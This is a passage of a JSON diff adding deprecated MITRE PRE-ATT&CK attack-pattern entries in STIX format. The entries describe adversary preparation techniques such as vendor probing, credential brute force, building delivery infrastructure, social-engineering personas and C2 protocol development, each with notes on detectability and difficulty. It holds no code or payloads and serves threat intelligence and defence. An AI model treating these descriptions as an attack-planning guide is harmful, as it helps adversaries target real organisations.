Retrieved March 6, 2017." + }, + { + "source_name": "CriticalInfrastructureAssessment", + "description": "J. Depoy, J. Phelan, P. Sholander, B. Smith, G.B. Varnado and G. Wyss. (2015). RISK ASSESSMENT for PHYSICAL AND CYBER ATTACKS on CRITICAL INFRASTRUCTURES. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Physical security is often unaware of implications of physical access to network. However, some organizations have thorough physical security measures that would log and report attempted incursions, perimeter breaches, unusual RF at a site, etc.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Social engineering and OSINT are still generally successful. Physical locations of offices/sites are easily determined. Monitoring for other sites of interest, such as backup storage vendors, is also easy to accomplish.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1079", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d69c3e06-8311-4093-8e3e-0a8e06b15d92", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess targeting options", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1296).\n\nAn adversary may assess a target's operational security (OPSEC) practices in order to identify targeting options. A target may share different information in different settings or be more of less cautious in different environments. (Citation: Scasny2015) (Citation: EverstineAirStrikes)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1296", + "external_id": "T1296" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + }, + { + "source_name": "EverstineAirStrikes", + "description": "Brian Everstine. (2015, June 04). Carlisle: Air Force intel uses ISIS 'moron's' social media posts to target airstrikes. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender does not have access to information stored outside of defenders scope or visibility (e.g., log data for Facebook is not easily accessible). Defender has very infrequent visibility into an adversary's more detailed TTPs for developing people targets.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Information is out in the open for items that are available - part of this is ease of use for consumers to support the expected networking use case. OSINT can provide many avenues to gather intel which contain weaknesses. Developing and refining the methodology to exploit weak human targets has been done for years (e.g., spies).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1073", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--1def484d-2343-470d-8925-88f45b5f9615", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess vulnerability of 3rd party vendors", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1298).\n\nOnce a 3rd party vendor has been identified as being of interest it can be probed for vulnerabilities just like the main target would be. (Citation: Zetter2015Threats) (Citation: WSJTargetBreach)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1298", + "external_id": "T1298" + }, + { + "source_name": "Zetter2015Threats", + "description": "Kim Zetter. (2015, January 4). The Biggest Security Threats We\u2019ll Face in 2015. Retrieved March 5, 2017." + }, + { + "source_name": "WSJTargetBreach", + "description": "Paul Ziobro. (2014, February 6). Target Breach Began With Contractor's Electronic Billing Link. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "3rd parties would most likely not report network scans to their partners. Target network would not know that their 3rd party partners were being used as a vector.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "The difficult part is enumerating all 3rd parties. Finding major partners would not be difficult. Significantly easier with insider knowledge. Vulnerability scanning the 3rd party networks is trivial.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1075", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--4fad17d3-8f42-449d-ac4b-dbb4c486127d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assign KITs, KIQs, and/or intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1238).\n\nOnce generated, Key Intelligence Topics (KITs), Key Intelligence Questions (KIQs), and/or intelligence requirements are assigned to applicable agencies and/or personnel. For example, an adversary may decide nuclear energy requirements should be assigned to a specific organization based on their mission. (Citation: AnalystsAndPolicymaking) (Citation: JP2-01)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1238", + "external_id": "T1238" + }, + { + "source_name": "AnalystsAndPolicymaking", + "description": "Jack Davis. (2002, September). Improving CIA Analytic Performance: Analysts and the Policymaking Process. Retrieved March 5, 2017." + }, + { + "source_name": "JP2-01", + "description": "Joint Chiefs of Staff. (2012, January 05). Joint and National Intelligence Support to Military Operations. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1015", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-direction" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a86a21a4-6304-4df3-aa6d-08114c47d48f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assign KITs/KIQs into categories", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1228).\n\nLeadership organizes Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) into three types of categories and creates more if necessary. An example of a description of key players KIT would be when an adversary assesses the cyber defensive capabilities of a nation-state threat actor. (Citation: Herring1999)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1228", + "external_id": "T1228" + }, + { + "source_name": "Herring1999", + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1005", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--4dfb98ea-03cc-4a9c-a3a7-b22e14f126c4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Authentication attempt", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nAttempt to use default vendor credentials, brute force credentials, or previously obtained legitimate credentials to authenticate remotely. This access could be to a web portal, through a VPN, or in a phone app. (Citation: Remote Access Healthcare) (Citation: RDP Point of Sale)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1381", + "url": "https://attack.mitre.org/techniques/T1381" + }, + { + "description": "Gary Glover. (2015, June 25). Remote access threats are imminent. Retrieved March 31, 2017.", + "source_name": "Remote Access Healthcare" + }, + { + "description": "Brian Prince. (2014, July 31). Hackers Turn Remote Desktop Tools Into Gateways for Point-of-Sale Malware Attacks. Retrieved March 31, 2017.", + "source_name": "RDP Point of Sale" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:13:56.705Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1158", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Attempt to use default vendor credentials, brute force credentials, or previously obtained legitimate credentials. This is increasingly difficult to obtain access when two-factor authentication mechanisms are employed.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "This is possible with diligent monitoring of login anomalies, expected user behavior/location. If the adversary uses legitimate credentials, it may go undetected.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--0440f60f-9056-4791-a740-8eae96eb61fa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Authorized user performs requested cyber action", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nClicking on links in email, opening attachments, or visiting websites that result in drive by downloads can all result in compromise due to users performing actions of a cyber nature. (Citation: AnonHBGary)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1386", + "url": "https://attack.mitre.org/techniques/T1386" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-10-14T01:53:27.989Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1163", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Users unwittingly click on spearphishing links frequently, despite training designed to educate about the perils of spearphishing.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Some environments have anti-spearphishing mechanisms to detect or block the link before it reaches the user.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + }, + { + "id": "attack-pattern--0e6abb17-0f81-4988-9fd2-4ba0b673d729", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Automated system performs requested action", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nUsers may be performing legitimate activity but using media that is compromised (e.g., using a USB drive that comes with malware installed during manufacture or supply). Upon insertion in the system the media auto-runs and the malware executes without further action by the user. (Citation: WSUSpect2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1384", + "url": "https://attack.mitre.org/techniques/T1384" + }, + { + "description": "Paul Stone & Alex Chapman. (2015, August 5). WSUSpect: Compromising the Windows Enterprise via Windows Update. Retrieved March 1, 2017.", + "source_name": "WSUSpect2015" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-03-30T14:15:05.089Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1161", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Autoruns with USB keys and CDs traditionally were always on (e.g., [http://windows.microsoft.com Windows] 7 is now an exception with a new policy of limiting the always on nature of Autoruns), ensuring and automated system completes a requested action. Specialized use cases exist where automated systems are specifically designed against automatically performing certain actions (e.g., USB/CD insertion and automatically running is disabled in certain environments).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Environments without extensive endpoint sensing capabilities do not typically collect this level of detailed information.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--15ef4da5-3b93-4bb1-a39a-5396661956d3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Build and configure delivery systems", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1347).\n\nDelivery systems are the infrastructure used by the adversary to host malware or other tools used during exploitation. Building and configuring delivery systems may include multiple activities such as registering domain names, renting hosting space, or configuring previously exploited environments. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1347", + "external_id": "T1347" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "It is detectable once deployed to the public Internet, used for adversarial purposes, discovered, and reported to defenders.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "It is easy to create and burn infrastructure. Otherwise, blacklisting would be more successful for defenders.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1124", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--4886e3c2-468b-4e26-b7e5-2031d995d13a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Build or acquire exploits", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1349).\n\nAn exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may use or modify existing exploits when those exploits are still relevant to the environment they are trying to compromise. (Citation: NYTStuxnet) (Citation: NationsBuying)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1349", + "external_id": "T1349" + }, + { + "source_name": "NYTStuxnet", + "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.", + "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" + }, + { + "source_name": "NationsBuying", + "description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.", + "url": "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1126", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Several exploit repositories and tool suites exist for re-use and tailoring.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but development will be performed on their local systems.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--9108e212-1c94-4f8d-be76-1aad9b4c86a4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Build social network persona", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1341).\n\nFor attacks incorporating social engineering the utilization of an on-line persona is important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites ([Facebook](https://www.facebook.com), [LinkedIn](https://www.linkedin.com), [Twitter](https://twitter.com), [Google+](https://plus.google.com), etc.). (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1341", + "external_id": "T1341" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + }, + { + "source_name": "RobinSageInterview", + "description": "Joan Goodchild. (2010, July 8). The Robin Sage experiment: Fake profile fools security pros. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1118", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Performing activities like typical users, but with specific intent in mind.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless there is some threat intelligence reporting, these users are hard to differentiate.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "created": "2017-12-14T16:46:06.044Z", + "modified": "2020-10-26T13:42:49.342Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "type": "attack-pattern", + "x_mitre_old_attack_id": "PRE-T1105", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Proliferation of DNS TLDs and registrars. Adversary may choose domains that are similar to legitimate domains (aka \"domain typosquatting\" or homoglyphs).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "This is by design captured in public registration logs. Various tools and services exist to track/query/monitor domain name registration information.", + "x_mitre_detectable_by_common_defenses": "Yes", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1328", + "external_id": "T1328" + }, + { + "source_name": "PWCSofacy2014", + "description": "Tom Lancaster and Michael Yip. (2014, December 05). APT28: Sofacy? So-funny.. Retrieved March 6, 2017." + } + ], + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1328).\n\nDomain Names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. (Citation: PWCSofacy2014)", + "name": "Buy domain name", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--45242287-2964-4a3e-9373-159fad4d8195", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--8e211ec9-5dfc-4915-aff4-84d5908f0336", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "C2 protocol development", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1352).\n\nCommand and Control (C2 or C&C) is a method by which the adversary communicates with malware. An adversary may use a variety of protocols and methods to execute C2 such as a centralized server, peer to peer, IRC, compromised web sites, or even social media. (Citation: HAMMERTOSS2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1352", + "external_id": "T1352" + }, + { + "source_name": "HAMMERTOSS2015", + "description": "FireEye. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but development will be performed on their local systems.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "C2 over commonly used and permitted protocols provides the necessary cover and access.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1129", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--7a265bf0-6acc-4f43-8b22-2e58b443e62e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Choose pre-compromised mobile app developer account credentials or signing keys", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1391).\n\nThe adversary can use account credentials or signing keys of an existing mobile app developer to publish malicious updates of existing mobile apps to an application store, or to abuse the developer's identity and reputation to publish new malicious apps. Many mobile devices are configured to automatically install new versions of already-installed apps. (Citation: Fraudenlent Apps Stolen Dev Credentials)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1391", + "external_id": "T1391" + }, + { + "source_name": "Fraudenlent Apps Stolen Dev Credentials", + "description": "Galen Gruman. (2014, December 5). Keep out hijackers: Secure your app store dev account. Retrieved April 12, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Possible to detect compromised credentials if alerting from a service provider is enabled and acted upon by the individual.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "The difficulty of obtaining useful developer credentials may vary. Well-organized, professional app developers whose credentials or signing keys would be the most useful to an adversary because of the large install bases of their apps, would likely strongly protect their credentials and signing keys. Less-organized app developers may not protect their credentials and signing keys as strongly, but the credentials and signing keys would also be less useful to an adversary. These less-organized app developers may reuse passwords across sites, fail to turn on multi-factor authentication features when available, or store signing keys in unprotected locations.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1168", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--9a8c47f6-ae69-4044-917d-4b1602af64d9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Choose pre-compromised persona and affiliated accounts", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1343).\n\nFor attacks incorporating social engineering the utilization of an on-line persona is important. Utilizing an existing persona with compromised accounts may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. (Citation: AnonHBGary) (Citation: Hacked Social Media Accounts)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1343", + "external_id": "T1343" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + }, + { + "source_name": "Hacked Social Media Accounts", + "description": "Marcus Habert. (2015, November 8). What Happens to Hacked Social Media Accounts. Retrieved March 28, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1120", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "It is relatively easy and low cost to purchase compromised credentials. Mining social media sites offers open source information about a particular target. Most users tend to reuse passwords across sites and are not paranoid enough to check and see if spoofed sites from their persona exist across current social media.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Possible to detect compromised credentials if alerting from a service provider is enabled and acted upon by the individual.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--0c592c79-29a7-4a94-81a4-c87eae3aead6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Common, high volume protocols and software", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1321).\n\nCertain types of traffic (e.g., Twitter14, HTTP) are more commonly used than others. Utilizing more common protocols and software may make an adversary's traffic more difficult to distinguish from legitimate traffic. (Citation: symantecNITRO)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1321", + "external_id": "T1321" + }, + { + "source_name": "symantecNITRO", + "description": "Eric Chien and Gavin O\u2019Gorman. (n.d.). The Nitro Attacks: Stealing Secrets from the Chemical Industry. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "High level of entropy in communications. High volume of communications makes it extremely hard for a defender to distinguish between legitimate and adversary communications.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to decipher or to make the communication less conspicuous.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1098", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise 3rd party infrastructure to support delivery", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1312).\n\nInstead of buying, leasing, or renting infrastructure an adversary may compromise 